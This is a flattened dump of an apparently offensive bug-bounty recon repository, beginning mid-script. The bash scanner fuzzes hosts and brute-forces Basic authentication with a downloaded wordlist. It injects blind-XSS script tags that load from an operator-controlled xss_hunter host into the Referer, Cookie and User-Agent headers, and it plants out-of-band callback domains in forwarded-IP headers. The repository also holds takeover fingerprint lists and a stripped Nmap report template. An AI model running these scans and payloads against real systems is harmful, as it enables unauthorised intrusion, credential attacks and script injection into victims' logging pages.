~/recon/$1/gau/tmp-$u.txt; done 404 | cat ~/recon/$1/gau/* | sort -u | getching >> ~/recon/$1/gau/$1-gau.txt 405 | rm ~/recon/$1/gau/tmp-* 406 | message "GAU%20Done%20for%20$1" 407 | echo "[+] Done gau for discovering useful endpoints" 408 | else 409 | message "[-]%20Skipping%20GAU%20for%20fingerprinting%20$1" 410 | echo "[!] Skipping ..." 411 | fi 412 | sleep 5 413 | 414 | echo "[+] DALFOX for injecting blindxss" 415 | if [ ! -z $(which dalfox) ]; then 416 | cat ~/recon/$1/$1-alive.txt | gau | grep "=" | dalfox pipe -b $xss_hunter -o ~/recon/$1/$1-dalfox.txt 417 | message "DALFOX%20Done%20for%20$1" 418 | echo "[+] Done dalfox for injecting blind xss" 419 | else 420 | message "[-]%20Skipping%20DALFOX%20for%20injecting%20blind%20xss%20in%20$1" 421 | echo "[!] Skipping ..." 422 | fi 423 | sleep 5 424 | 425 | echo "[+] KXSS for potential vulnerable xss" 426 | if [ ! -z $(which kxss) ]; then 427 | cat ~/recon/$1/$1-alive.txt | gau | grep "=" | kxss | grep "is reflected and allows" | awk {'print $9'} | sort -u >> ~/recon/$1/kxss/$1-kxss.txt 428 | message "KXSS%20Done%20for%20$1" 429 | echo "[+] Done kxss for potential xss" 430 | else 431 | message "[-]%20Skipping%20KXSS%20for%20potential%20kxss%20in%20$1" 432 | echo "[!] Skipping ..." 433 | fi 434 | sleep 5 435 | 436 | echo "[+] 401 Scanning" 437 | [ ! -f ~/tools/basic_auth.txt ] && wget https://raw.githubusercontent.com/phspade/Combined-Wordlists/master/basic_auth.txt -O ~/tools/basic_auth.txt 438 | if [ ! -z $(which ffuf) ]; then 439 | for i in $(cat ~/recon/$1/$1-httprobe.txt); do 440 | filename=$(echo $i | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 441 | stat_code=$(curl -s -o /dev/null -w "%{http_code}" "$i" --max-time 10) 442 | if [ 401 == $stat_code ]; then 443 | ffuf -c -w ~/tools/basic_auth.txt -u $i -k -r -H "Authorization: Basic FUZZ" -mc all -fc 500-599,401 -of html -o ~/recon/$1/401/$filename-basic-auth.html 444 | else 445 | echo "$stat_code >> $i" 446 | fi 447 | done 448 | message "401%20Scan%20Done%20for%20$1" 449 | echo "[+] Done 401 Scanning for $1" 450 | else 451 | message "[-]%20Skipping%20ffuf%20for%20401%20scanning" 452 | echo "[!] Skipping ..." 453 | fi 454 | sleep 5 455 | 456 | echo "[+] Scanning for Virtual Hosts Resolution [+]" 457 | if [ ! -z $(which ffuf) ]; then 458 | [ ! -f ~/tools/virtual-host-scanning.txt ] && wget "https://raw.githubusercontent.com/codingo/VHostScan/master/VHostScan/wordlists/virtual-host-scanning.txt" -O ~/tools/virtual-host-scanning.txt 459 | cat ~/recon/$1/$1-open-ports.txt ~/recon/$1/$1-final.txt ~/tools/virtual-host-scanning.txt | sed "s/\%s/$1/g" | sort -u >> ~/recon/$1/$1-temp-vhost-wordlist.txt 460 | for target in $(cat ~/recon/$1/$1-alive.txt); do ffuf -c -w ~/recon/$1/$1-temp-vhost-wordlist.txt -u http://$target -k -r -H "Host: FUZZ" -H "X-Forwarded-For: $target.scanner.xforwarded.$dns_server" -H "X-Real-IP: $target.scanner.xrealip.$dns_server" -H "X-Originating-IP: $target.scanner.xoriginatingip.$dns_server" -H "Client-IP: $target.scanner.clientip.$dns_server" -H "CF-Connecting_IP: $target.scanner.cfconnectingip.$dns_server" -H "Forwarded: for=$target.scanner.for-forwarded.$dns_server;by=$target.scanner.by-forwarded.$dns_server;host=$target.scanner.host-forwarded.$dns_server" -H "X-Client-IP: $target.scanner.xclientip.$dns_server" -H "True-Client-IP: $target.scanner.trueclientip.$dns_server" -H "X-Forwarded-Host: $target.scanner.xforwardedhost.$dns_server" -H "Referer: $xss_hunter/$target/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -H "User-Agent: %22%27%3Eblahblah%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2Fscript%3Etesting" -mc all -fc 500-599,400,406,301 -of html -o ~/recon/$1/virtual-hosts/$target.html; done 461 | message "Virtual%20Host%20done%20for%20$1" 462 | echo "[+] Done ffuf for scanning virtual hosts" 463 | else 464 | message "[-]%20Skipping%20ffuf%20for%20vhost%20scanning" 465 | echo "[!] Skipping ..." 466 | fi 467 | rm ~/recon/$1/$1-temp-vhost-wordlist.txt 468 | sleep 5 469 | 470 | echo "[+] Dir and Files Scanning for Sensitive Files [+]" 471 | if [ ! -z $(which ffuf) ]; then 472 | for i in $(cat ~/recon/$1/$1-httprobe.txt); do 473 | filename=$(echo $i | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 474 | stat_code=$(curl -s -o /dev/null -w "%{http_code}" "$i" --max-time 10) 475 | if [ 404 == $stat_code ]; then 476 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,404,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 477 | elif [ 403 == $stat_code ]; then 478 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,403,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 479 | elif [ 401 == $stat_code ]; then 480 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,401,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 481 | elif [ 200 == $stat_code ]; then 482 | ffuf -c -D -w ~/tools/dicc.txt -ic -t 100 -k -e json,config,yml,yaml,bak,log,zip,php,txt,jsp,html,aspx,asp,axd,config -u $i/FUZZ -mc all -fc 500-599,404,301,400 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "Referer: $xss_hunter/$i/%27%22%3E%3Cscript%20src%3D%22$xss_hunter%2F%22%3E%3C%2Fscript%3E" -H "Cookie: test=%27%3E%27%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3Cscript%20src%3D%22$xss_hunter%22%3E%3C%2fscript%3E" -of html -o ~/recon/$1/dirsearch/$filename.html 483 | else 484 | echo "$i >> $stat_code" 485 | fi 486 | done 487 | message "Dir%20and%20files%20Scan%20Done%20for%20$1" 488 | echo "[+] Done ffuf for file and directory scanning" 489 | else 490 | message "[-]%20Skipping%20ffuf%20for%20dir%20and%20files%20scanning" 491 | echo "[!] Skipping ..." 492 | fi 493 | sleep 5 494 | 495 | [ ! -f ~/$1.out ] && mv ~/$1.out ~/recon/$1/ 496 | message "Scanner%20Done%20for%20$1" 497 | date 498 | echo "[+] Done scanner :)" 499 | -------------------------------------------------------------------------------- /tools/.creds: -------------------------------------------------------------------------------- 1 | password = password123 ##changeme ofcourse 2 | telegram_bot = mytelegrambot ##changeme ofcourse 3 | telegram_id = 123456 4 | dns_server = myserver.xyz 5 | xss_hunter = https://yourown.xss.ht/ 6 | -------------------------------------------------------------------------------- /tools/.tokens: -------------------------------------------------------------------------------- 1 | github_token_here -------------------------------------------------------------------------------- /tools/fingerprints.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "service": "fastly", 4 | "cname": [ 5 | "fastly" 6 | ], 7 | "fingerprint": [ 8 | "Fastly error: unknown domain" 9 | ], 10 | "nxdomain": false 11 | }, 12 | { 13 | "service": "github", 14 | "cname": [ 15 | "github.io" 16 | ], 17 | "fingerprint": [ 18 | "There isn't a GitHub Pages site here." 19 | ], 20 | "nxdomain": false 21 | }, 22 | { 23 | "service": "heroku", 24 | "cname": [ 25 | "herokuapp" 26 | ], 27 | "fingerprint": [ 28 | "herokucdn.com/error-pages/no-such-app.html" 29 | ], 30 | "nxdomain": false 31 | }, 32 | { 33 | "service": "pantheon", 34 | "cname": [ 35 | "pantheonsite.io" 36 | ], 37 | "fingerprint": [ 38 | "The gods are wise, but do not know of the site which you seek." 39 | ], 40 | "nxdomain": false 41 | }, 42 | { 43 | "service": "tumblr", 44 | "cname": [ 45 | "domains.tumblr.com" 46 | ], 47 | "fingerprint": [ 48 | "Whatever you were looking for doesn't currently exist at this address." 49 | ], 50 | "nxdomain": false 51 | }, 52 | { 53 | "service": "wordpress", 54 | "cname": [ 55 | "wordpress.com" 56 | ], 57 | "fingerprint": [ 58 | "Do you want to register" 59 | ], 60 | "nxdomain": false 61 | }, 62 | { 63 | "service": "teamwork", 64 | "cname": [ 65 | "teamwork.com" 66 | ], 67 | "fingerprint": [ 68 | "Oops - We didn't find your site." 69 | ], 70 | "nxdomain": false 71 | }, 72 | { 73 | "service": "helpjuice", 74 | "cname": [ 75 | "helpjuice.com" 76 | ], 77 | "fingerprint": [ 78 | "We could not find what you're looking for." 79 | ], 80 | "nxdomain": false 81 | }, 82 | { 83 | "service": "helpscout", 84 | "cname": [ 85 | "helpscoutdocs.com" 86 | ], 87 | "fingerprint": [ 88 | "No settings were found for this company:" 89 | ], 90 | "nxdomain": false 91 | }, 92 | { 93 | "service": "s3 bucket", 94 | "cname": [ 95 | "amazonaws" 96 | ], 97 | "fingerprint": [ 98 | "The specified bucket does not exist" 99 | ], 100 | "nxdomain": false 101 | }, 102 | { 103 | "service": "ghost", 104 | "cname": [ 105 | "ghost.io" 106 | ], 107 | "fingerprint": [ 108 | "The thing you were looking for is no longer here, or never was" 109 | ], 110 | "nxdomain": false 111 | }, 112 | { 113 | "service": "feedpress", 114 | "cname": [ 115 | "redirect.feedpress.me" 116 | ], 117 | "fingerprint": [ 118 | "The feed has not been found." 119 | ], 120 | "nxdomain": false 121 | }, 122 | { 123 | "service": "shopify", 124 | "cname": [ 125 | "myshopify.com" 126 | ], 127 | "fingerprint": [ 128 | "Sorry, this shop is currently unavailable." 129 | ], 130 | "nxdomain": false 131 | }, 132 | { 133 | "service": "statuspage", 134 | "cname": [ 135 | "statuspage.io" 136 | ], 137 | "fingerprint": [ 138 | "You are being redirected" 139 | ], 140 | "nxdomain": false 141 | }, 142 | { 143 | "service": "uservoice", 144 | "cname": [ 145 | "uservoice.com" 146 | ], 147 | "fingerprint": [ 148 | "This UserVoice subdomain is currently available!" 149 | ], 150 | "nxdomain": false 151 | }, 152 | { 153 | "service": "surge", 154 | "cname": [ 155 | "surge.sh" 156 | ], 157 | "fingerprint": [ 158 | "project not found" 159 | ], 160 | "nxdomain": false 161 | }, 162 | { 163 | "service": "bitbucket", 164 | "cname": [ 165 | "bitbucket.io" 166 | ], 167 | "fingerprint": [ 168 | "Repository not found" 169 | ], 170 | "nxdomain": false 171 | }, 172 | { 173 | "service": "intercom", 174 | "cname": [ 175 | "custom.intercom.help" 176 | ], 177 | "fingerprint": [ 178 | "This page is reserved for artistic dogs.", 179 | "

" 180 | ], 181 | "nxdomain": false 182 | }, 183 | { 184 | "service": "webflow", 185 | "cname": [ 186 | "proxy.webflow.com", 187 | "proxy-ssl.webflow.com" 188 | ], 189 | "fingerprint": [ 190 | "

The page you are looking for doesn't exist or has been moved.

" 191 | ], 192 | "nxdomain": false 193 | }, 194 | { 195 | "service": "wishpond", 196 | "cname": [ 197 | "wishpond.com" 198 | ], 199 | "fingerprint": [ 200 | "https://www.wishpond.com/404?campaign=true" 201 | ], 202 | "nxdomain": false 203 | }, 204 | { 205 | "service": "aftership", 206 | "cname": [ 207 | "aftership.com" 208 | ], 209 | "fingerprint": [ 210 | "Oops.

The page you're looking for doesn't exist." 211 | ], 212 | "nxdomain": false 213 | }, 214 | { 215 | "service": "aha", 216 | "cname": [ 217 | "ideas.aha.io" 218 | ], 219 | "fingerprint": [ 220 | "There is no portal here ... sending you back to Aha!" 221 | ], 222 | "nxdomain": false 223 | }, 224 | { 225 | "service": "tictail", 226 | "cname": [ 227 | "domains.tictail.com" 228 | ], 229 | "fingerprint": [ 230 | "to target URL: Error Code: 404

" 244 | ], 245 | "nxdomain": false 246 | }, 247 | { 248 | "service": "bigcartel", 249 | "cname": [ 250 | "bigcartel.com" 251 | ], 252 | "fingerprint": [ 253 | "

Oops! We could’t find that page.

" 254 | ], 255 | "nxdomain": false 256 | }, 257 | { 258 | "service": "campaignmonitor", 259 | "cname": [ 260 | "createsend.com" 261 | ], 262 | "fingerprint": [ 263 | "Double check the URL or
2 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 40 | Scan Report Nmap <xsl:value-of select="/nmaprun/@version"/> 41 | 42 | 43 | 63 |
64 |
65 |

Scan Report
Nmap

66 |
67 |

68 |
69 | hosts scanned. 70 | hosts up. 71 | hosts down. 72 |

73 |
74 |
75 | width:%; 76 | 77 | 78 |
79 |
80 | width:%; 81 | 82 | 83 |
84 |
85 |
86 |

Scanned Hosts (offline hosts are hidden)

87 |
88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 |
StateAddressHostnameTCP (open)UDP (open)
label label-success
label label-success
125 |
126 | 131 |

Online Hosts

132 | 133 |
134 |
135 |

-

136 |
137 |
138 | 139 |

Hostnames

140 |
    141 | 142 |
  • ()
  • 143 |
    144 |
145 |
146 |

Ports

147 |
148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 |
PortProtocolState
Reason
ServiceProductVersionExtra Info

175 | https://nvd.nist.gov/vuln/search/results?form_type=Advanced&cves=on&cpe_version= 176 | 177 |
178 |
179 |
180 |



220 |
221 | 222 |

Host Script

223 |
224 | 225 |
226 |
227 |
228 |
229 |
230 |
231 |

Open Services

232 |
233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 |
AddressPortProtocolServiceProductVersionCPEExtra info
-
263 |
264 | 269 |
270 | 279 | 280 | 281 | 282 | 283 | -------------------------------------------------------------------------------- /tools/providers-data.csv: -------------------------------------------------------------------------------- 1 | name,cname,string,http 2 | github,github,There isn't a GitHub Pages site here.,false 3 | github,github,For root URLs (like http://example.com/) you must provide an index.html file,false 4 | heroku,heroku,There's nothing here,true 5 | heroku,heroku,No such app,true 6 | tumblr,tumblr.com,There's nothing here.,true 7 | tumblr,tumblr.com,Whatever you were looking for doesn't currently exist at this address,true 8 | shopify,myshopify.com,Only one step left!,false 9 | shopify,myshopify.com,"Sorry, this shop is currently unavailable.",false 10 | instapage,pageserve.co,You've Discovered A Missing Link. Our Apologies!,false 11 | tictail,tictail.com,Building a brand of your own?,true 12 | campaignmonitor,createsend.com,Trying to access your account?,false 13 | cargocollective,cargocollective.com,404 Not Found,false 14 | amazonaws,amazonaws.com,NoSuchBucket,false 15 | amazonaws,amazonaws.com,The specified bucket does not exist,false 16 | smartling,smartling.com,Domain is not configured,false 17 | acquia,acquia.com,If you are an Acquia Cloud customer and expect to see your site at this address,false 18 | fastly,fastly.net,Please check that this domain has been added to a service,false 19 | fastly,fastly.net,Fastly error: unknown domain:,false 20 | pantheon,pantheonsite.io,The gods are wise,false 21 | uservoice,uservoice.com,This UserVoice subdomain is currently available!,false 22 | ghost,ghost.io,The thing you were looking for is no longer here,false 23 | pingdom,stats.pingdom.com,pingdom,false 24 | feedpress,redirect.feedpress.me,The feed has not been found,false 25 | helpjuice,helpjuice.com,We could not find what you're looking for.,false 26 | surge,surge.sh,project not found,false 27 | surveygizmo-eu,privatedomain.surveygizmo.eu,data-html-name,false 28 | teamwork,teamwork.com,Oops - We didn't find your site.,false 29 | wordpress,wordpress,Domain mapping upgrade for this domain not found,false 30 | wordpress,wordpress,Do you want to register *.wordpress.com?,false 31 | bitbucket,bitbucket.io,Repository not found,true 32 | helpscout,helpscoutdocs.com,No settings were found for this company:,false 33 | jetbrains,myjetbrains.com,is not a registered InCloud YouTrack,false 34 | azure,azurewebsites.net,404 Web Site not found,false 35 | readme,readme.io,"Project doesnt exist... yet!",false 36 | kinsta,kinsta.com,No Site For Domain,false 37 | intercom,intercom.io,Uh oh. That page doesn't exist.,false 38 | launchrock,launchrock.com,It looks like you may have taken a wrong turn somewhere,false 39 | pantheon,pantheon.io,404 error unknown site,false 40 | strikingly,strikinglydns.com,page not found,false 41 | uptimerobot,uptimerobot.com,page not found,false 42 | fly,fly.io,404 Not Found,false 43 | --------------------------------------------------------------------------------